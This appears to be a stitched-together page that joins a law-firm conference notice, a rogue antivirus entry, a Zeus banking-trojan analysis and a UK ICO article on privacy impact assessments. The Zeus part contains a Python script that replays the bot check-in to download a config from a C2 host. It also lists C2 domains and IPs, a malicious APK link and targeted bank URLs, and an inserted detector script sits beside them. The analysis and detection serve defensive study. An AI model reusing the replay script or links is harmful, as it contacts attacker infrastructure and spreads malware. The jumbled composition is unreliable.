Join us at the International Association of Privacy Professionals (“IAPP”) Global Privacy Summit in Washington, D.C., March 5-7, 2014. Hunton & Williams privacy professionals will be featured speakers in the following sessions:

  • Protecting Privacy under the Cybersecurity Microscope
    Thursday, March 6, 10:45 a.m.
    Speakers include: Lisa J. Sotto, partner and head of the Global Privacy and Cybersecurity practice, Hunton & Williams LLP; Victoria King, Global Privacy Officer, United Parcel Service, Inc.; and Karen Neuman, Chief Privacy Officer, U.S. Department of Homeland Security.
  • Thinking Ahead vs. Keeping Up: The Challenge to Think Strategically
    Thursday, March 6, 10:45 a.m.
    Fred H. Cate, Senior Policy Advisor of the Centre for Information Policy Leadership at Hunton & Williams LLP and Distinguished Professor of Indiana University, will moderate the session. Speakers include: Sharon Anolik, President, Privacy Panacea; Stanley Crosley, Director, Indiana University CLEAR Health Information, Crosley Law Offices LLC; and Peter Lefkowitz, Chief Privacy Officer, General Electric Company.
  • The Risks of Processing Personal Information
    Thursday, March 6, 1:00 p.m.
    Bojana Bellamy, President of the Centre for Information Policy Leadership at Hunton & Williams LLP, will moderate the session. Speakers include: Peter Cullen, General Manager Trustworthy Computing, Microsoft Corporation; Isabelle Falque-Pierrotin, President, French Data Protection Authority (CNIL); Florence Raynal, Head of the Department of European and International Affairs, French Data Protection Authority (CNIL); and Richard Thomas, Global Strategy Advisor of the Centre for Information Policy Leadership at Hunton & Williams LLP.
  • The Digital Marketing Ecosystem: Trends, Risks and Obligations
    Thursday, March 6, 2:30 p.m.
    Speakers include: Bridget Treacy, partner, Hunton & Williams LLP; and Teena H. Lee, Vice President, Privacy and E-commerce Counsel, The Estée Lauder Companies Inc.

In addition to these panels, stop by Booth 2 in the Exhibit Hall to learn more about Hunton & Williams’ Global Privacy and Cybersecurity practice and its Centre for Information Policy Leadership. Visit the IAPP’s website for more information and the full conference schedule.

Windows Protection Booster

Windows Protection Booster is a fake antivirus. This rogue displays fake alerts to scare users. It replaces Windows AntiVirus Booster, Windows AntiVirus Helper, Windows AntiVirus Tool, Windows Antivirus Suite, Windows AntiBreach Helper, Windows AntiBreach Suite, Windows AntiBreach Tool, Windows Paramount Protection, Windows Antivirus Master, Windows Safety Master, Windows Ultimate Booster, Windows Efficiency Kit, Windows Prime Accelerator, Windows Prime Shield, Windows Prime Booster, Windows Virtual Protector, Windows Accelerator Pro, Windows Premium Shield, Windows Efficiency Console, Windows Activity Booster, Windows Warding Module, Windows Active HotSpot, Windows Cleaning Toolkit, Windows Expert Console, Windows Safety Series, Windows Secure Workstation, Windows Anti-Malware Patch, Windows Virtual Security, Windows Antivirus Release, Windows Interactive Safety, Windows Ultimate Safeguard, Windows Antivirus Machine, Windows Active Guard, Windows Security Renewal, Windows Home Patron, Windows Virtual Firewall, Windows Premium Defender, Windows Web Combat, Windows Virtual Angel, Windows Profound Security, Windows Expert Series, Windows Virus Hunter, Windows Web Commander, Windows Interactive Security, Windows Proprietary Advisor, Windows Privacy Extension, Windows Custom Management, Windows Pro Defence, Windows Control Series, Windows Advanced Toolkit, Windows Proactive Safety, Windows Maintenance Guard, Windows Secure Web Patch, Windows Active Defender, Windows Instant Scanner, Windows Privacy Counsel, Windows Custom Safety, Windows Privacy Module, Windows Maintenance Suite, Windows PC Aid, Windows Safety Wizard, Windows TurnKey Console, Windows Malware Firewall, Windows Antivirus Rampart, Windows Ultimate Security Patch, Windows Defence Counsel, Windows Guard Tools, Windows Safety Maintenance, Windows Multi Control System, Windows Pro Safety, Windows Private Shield, Windows Pro Safety Release, Windows Safeguard Upgrade, Windows Secure Surfer, Windows Be-on-Guard Edition, Windows Abnormality Checker, Windows Pro Solutions, Windows Sleek Performance, Windows ProSecurity Scanner, Windows Advanced User Patch, Windows Internet Booster, Windows Pro Web Helper, Windows Daily Adviser, Windows Safety Module, Windows High-End Protection, Windows Recovery Series, Windows Safety Checkpoint, Windows Premium Guard, Windows Efficiency Accelerator, Windows Performance Adviser, Windows Pro Rescuer, Windows Safety Toolkit, Windows Antivirus Care, Windows Guard Solutions, Windows Safety Manager, Windows Antivirus Patch, Windows Protection Unit, Windows Crucial Scanner, Windows Foolproof Protector, Windows Antibreaking System, Windows Component Protector, Windows Cleaning Tools, Windows Stability Maximizer, Windows Processes Accelerator, Windows Efficiency Reservoir, Windows Care Taker, Windows Custodian Utility, Windows Shielding Utility, Windows Warding System, Windows Activity Debugger, Windows First-Class Protector, Windows Trouble Taker, Windows Managing System, Windows Defending Center, Windows Debug Center, Windows No-Risk Agent, Windows Software Saver, Windows Antihazard Helper, Windows AntiHazard Center, Windows Process Director, Windows Guardian Angel, Windows Software Keeper, Windows Problems Stopper, Windows Health Keeper, Windows No-Risk Center, Windows Antihazard Solution, Windows Risk Minimizer, Windows Managing System, Windows Safety Tweaker, Windows Tools Patch, Windows Personal Doctor, Windows Personal Detective, Windows Trojans Sleuth, Windows Malware Sleuth, Windows Trojans Inspector, Windows Attacks Defender, Windows Attacks Preventor, Windows Threats Destroyer, Windows Firewall Constructor, Windows Stability Guard, Windows Basic Antivirus, Windows PRO Scanner, Windows Shield Tool, Windows Telemetry Center, Windows Performance Catalyst, Windows Smart Partner, Windows Smart Warden, Windows Functionality Checker, Windows Protection Master

To register (and help with removal), copy and paste this code: 0W000-000B0-00T00-E0021

Zeus 1.1.3.4

RSA FirstWatch recently threw me a sample of a 'new' Zeus variant.
I didn't really check all the changes that were made, but it seems to be nothing more than a standard Zeus v2.
But wait: it communicates over SSL and has a new kind of HTTP request pattern:

Fiddler:

Config download in Python (urllib2, Python 2):
import urllib2

# Replay the bot's check-in: the X_ headers identify the bot, its OS and the variant version
request = urllib2.Request('https://secureinformat.com/?ajax')
request.add_header('Accept', '*/*')
request.add_header('X_ID', '14E255CE7875768FBC303C10')  # bot ID
request.add_header('X_OS', '510')                       # OS version
request.add_header('X_BV', '1.1.3.4')                   # variant version
request.add_header('Control', 'no-cache')               # sic: 'Control', not 'Cache-Control'
request.add_header('User-Agent', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729;')
page = urllib2.urlopen(request).read()
# The server returns the config as a binary attachment named 'ajax'; write it out in binary mode
with open('ajax', 'wb') as f:
    f.write(page)

Notice the new headers:
X_ID = Bot ID
X_OS = OS version
X_BV = Variant version

The server's response sets X_ID as a cookie:
<< HTTP/1.1 200 OK
<< Date: Fri, 28 Feb 2014 06:35:34 GMT
<< Server: Apache
<< Set-Cookie: X_ID=14E255CE7875768FBC303C10; expires=Sat, 28-Feb-2015 06:35:34 GMT; path=/
<< Content-Description: File Transfer
<< Content-Disposition: attachment; filename=ajax
<< Content-Transfer-Encoding: binary
<< Expires: 0
<< Cache-Control: must-revalidate, post-check=0, pre-check=0
<< Pragma: public
<< Content-Length: 3685
<< Connection: close
<< Content-Type: application/octet-stream
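The check-in exchange above has several stable traits a network defender can key on. The following Python 3 detector is an added example, not code from the original post; it parses raw HTTP headers and flags the X_ID/X_OS/X_BV headers, the non-standard 'Control' header, the '?ajax' path, the dangling ';' in the User-Agent, and a reply that echoes X_ID as a cookie while serving an 'ajax' attachment. The sample messages are constructed from the post's request and response, the 24-hex-digit X_ID format and the three-trait threshold are assumptions.

```python
"""Detects the Zeus 1.1.3.4 config check-in described above from raw HTTP headers.
Added example, not code from the original post; sample messages are constructed."""
import re
from typing import Dict, List, Optional, Tuple

BOT_HEADERS = ("x_id", "x_os", "x_bv")
# 24 hex digits is the X_ID length in the posted sample; generalising is an assumption
X_ID_RE = re.compile(r"^[0-9A-Fa-f]{24}$")

# Constructed bot check-in, built from the request the post reproduces
SAMPLE_REQUEST = (
    "GET /?ajax HTTP/1.1\r\n"
    "Accept: */*\r\n"
    "X_ID: 14E255CE7875768FBC303C10\r\n"
    "X_OS: 510\r\n"
    "X_BV: 1.1.3.4\r\n"
    "Control: no-cache\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; "
    ".NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729;\r\n"
    "Host: secureinformat.com\r\n\r\n"
)

# Constructed server reply, built from the response headers shown above
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Apache\r\n"
    "Set-Cookie: X_ID=14E255CE7875768FBC303C10; expires=Sat, 28-Feb-2015 06:35:34 GMT; path=/\r\n"
    "Content-Disposition: attachment; filename=ajax\r\n"
    "Content-Type: application/octet-stream\r\n\r\n"
)

# Constructed ordinary browser request that must not trigger the detector
BENIGN_REQUEST = (
    "GET /index.html HTTP/1.1\r\n"
    "Host: www.example.com\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:27.0) Gecko/20100101 Firefox/27.0\r\n"
    "Accept: */*\r\n\r\n"
)


def parse_http(raw: str) -> Tuple[str, Dict[str, str]]:
    """Split a raw HTTP message into start line and lower-cased header dict (body ignored)."""
    lines = raw.split("\r\n\r\n", 1)[0].split("\r\n")
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def request_traits(raw: str) -> List[str]:
    """Return the check-in traits present in a request, as readable reasons."""
    start, h = parse_http(raw)
    traits = []
    if all(name in h for name in BOT_HEADERS):
        traits.append("X_ID/X_OS/X_BV bot headers present")
    if X_ID_RE.match(h.get("x_id", "")):
        traits.append("X_ID is a 24-hex-digit bot id")
    if "control" in h and "cache-control" not in h:
        traits.append("non-standard 'Control' header in place of Cache-Control")
    parts = start.split()
    if len(parts) >= 2 and parts[1].endswith("?ajax"):
        traits.append("'?ajax' config download path")
    if h.get("user-agent", "").endswith(";"):
        traits.append("User-Agent ends with a dangling ';'")
    return traits


def response_traits(raw: str, request_x_id: Optional[str] = None) -> List[str]:
    """Return reply traits; when the request's X_ID is known the cookie must echo it exactly."""
    _, h = parse_http(raw)
    traits = []
    m = re.search(r"X_ID=([^;]+)", h.get("set-cookie", ""))
    if m and (request_x_id is None or m.group(1) == request_x_id):
        traits.append("server echoes bot X_ID as a cookie")
    if re.search(r"attachment;\s*filename=ajax$", h.get("content-disposition", "")):
        traits.append("config served as an attachment named 'ajax'")
    if h.get("content-type") == "application/octet-stream":
        traits.append("config served as application/octet-stream")
    return traits


def is_zeus_checkin(request: str, response: Optional[str] = None) -> bool:
    """The X_ID/X_OS/X_BV triple alone is decisive; otherwise require three corroborating
    traits across request and reply (a threshold chosen here as an assumption)."""
    traits = request_traits(request)
    if "X_ID/X_OS/X_BV bot headers present" in traits:
        return True
    if response is not None:
        traits += response_traits(response, parse_http(request)[1].get("x_id"))
    return len(traits) >= 3


if __name__ == "__main__":
    print("sample:", is_zeus_checkin(SAMPLE_REQUEST, SAMPLE_RESPONSE), request_traits(SAMPLE_REQUEST))
    print("benign:", is_zeus_checkin(BENIGN_REQUEST), request_traits(BENIGN_REQUEST))
```

Requiring the cookie to echo the request's exact X_ID is what separates this check-in from an ordinary site that happens to set a cookie of the same name.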

Sample: bb9fe8c3df598b8b6ea2f2653c38ecd2
Version: 1.1.3.4
Drop Point: http://localhost/gate.php
Infection Point: http://localhost/bot.exe
Update Point:
http://secureinformat.com/?ajax (static config)

For unpacking the config, again nothing new: regular Zeus v2.
Once unpacked, we can see that the malware is targeting German banks and Trusteer:
http*://*netbanking.sparkasse.at/hilfe/sicherheit*
https://*banking.berliner-bank.de/trxm*
https://*banking.co.at*
https://*commerzbank.de*
https://*commerzbanking.de*
https://*meine.deutsche-bank.de/trxm/db*
https://*meine.norisbank.de/trxm/noris*
https://banking.postbank.de/rai*
https://banking.sparda.de*
https://finanzportal.fiducia.de*
https://netbanking.sparkasse.at/*
https://netbanking.sparkasse.at/casserver/login*
https://netbanking.sparkasse.at/sPortal/*
https://online-*.unicredit.it/*
https://online.bankaustria.at*
https://*commerzbank.de*
https://*commerzbanking.de*
https://*meine.deutsche-bank.de/trxm/db*
https://*meine.norisbank.de/trxm/noris*
https://www.trusteer.com/ProtectYourMoney*
WebInjects:

Man in the browser:

Clean browser surfing Trusteer website:

Infected browser surfing Trusteer website:
Requesting the user to download an APK:
Test done on the latest Firefox version (v27.0.1)

bit.ly/1jmQHmA = hxtp://shlyxiest.biz/cdn/Trusteer-Mobile.apk
>> https://www.virustotal.com/en/file/2f82ce7288137c0acbeefd9ef9f63926057871611703e77803b842201009767a/analysis/1393786189/
Phone number:  79670478968

Identified as Perkel.c by Kaspersky; Perkel is Android malware that was sold by Perkele (this guy was later banned from underground forums for scamming, but that's another story).

Sort of Fake AV:

Sample: 917df7b6268ba705b192b89a1cf28764
Version: 1.1.3.4
Drop Point: http://localhost/gate.php
Infection Point: http://localhost/bot.exe
Update Points:
https://koloboktv.com/?ajax (static config)
https://securestakan2.net/?ajax (dynamic config)
https://securemagnit5.net/?ajax (dynamic config)
WebInjects:

Sample: 7fb62987f20b002475cb1499eb86a1f5
Version: 1.1.2.1
Update Point:
https://securestatic.com/?ajax (static config)

All these samples use the same IP range:
• dns: 1 ›› ip: 37.228.92.170 - adress: SECURE730.COM
• dns: 1 ›› ip: 37.228.92.169 - adress: SECUREINFORMAT.COM
• dns: 1 ›› ip: 37.228.92.148 - adress: SHLYXIEST.BIZ
• dns: 1 ›› ip: 37.228.92.147 - adress: SECURESTATIC.COM
• dns: 1 ›› ip: 37.228.92.146 - adress: KOLOBOKTV.COM

I've written a small YARA rule in the hope of seeing more of these.
All the configs I grabbed were reporting to localhost, not to a server...

UK ICO Publishes Updated Code of Practice on Privacy Impact Assessments

On February 25, 2014, the UK Information Commissioner’s Office (“ICO”) published an updated code of practice on conducting privacy impact assessments (“PIAs”) (the “Code”). The updated Code takes into account the ICO’s consultation and research project on the conduct of PIAs, and reflects the increased use of PIAs in practice.

Under the UK Data Protection Act 1998 (the “Act”), organizations are not subject to any statutory requirement to conduct PIAs. However, the ICO promotes PIAs as a useful good practice tool to help manage compliance with key obligations under the Act, including fair and lawful processing, purpose limitation, data quality and minimization, security safeguards, international data transfers, and individuals’ rights in relation to their personal data. In the ICO’s view, organizations that choose to conduct PIAs are better able to identify data protection compliance issues early on, thereby avoiding potential costs and associated reputational damage that might otherwise occur. The ICO also emphasizes that PIAs are an “integral” part of privacy by design. Even if a detailed PIA is not required by law, the ICO recommends that organizations nevertheless conduct a legal compliance check against the requirements of the Act.

The ICO considers its PIA methodology to be sufficiently flexible, so it can be used by all types of organizations and be integrated with existing compliance practices. The Code emphasizes that there is no one-size-fits-all approach for PIAs, and that each organization is “best placed to determine how it considers the issue of privacy risks,” emphasizing that “conducting a PIA does not have to be complex or time consuming but there must be a level of rigor in proportion to the privacy risks arising.” The Code stresses that consultation is an important part of a PIA. In particular, effective internal consultation is key; without the involvement of relevant stakeholders, privacy risks are likely to remain unmitigated.

The Code provides examples of the types of projects that may benefit from a PIA, including new IT systems, data sharing initiatives, profiling, surveillance systems and using existing personal data for new and unexpected (or potentially intrusive) purposes. Annex 1 to the Code provides example screening questions that organizations may use to determine whether a substantive PIA is required, including questions relating to new uses of existing data sets, and the use of technologies that may be perceived as being particularly invasive (for example, facial recognition technology). Annex 3 provides example PIA questions linked to the eight Data Protection Principles contained in the Act. For example, for Principle 3 (personal data shall be adequate, relevant and not excessive in relation to the purpose(s) for which they are processed), the Code suggests asking, “[w]hich personal data could you not use, without compromising the needs of the project?”

Finally, the ICO encourages organizations to publish their PIAs to improve transparency and to improve individuals’ understanding of the ways in which their personal data are used.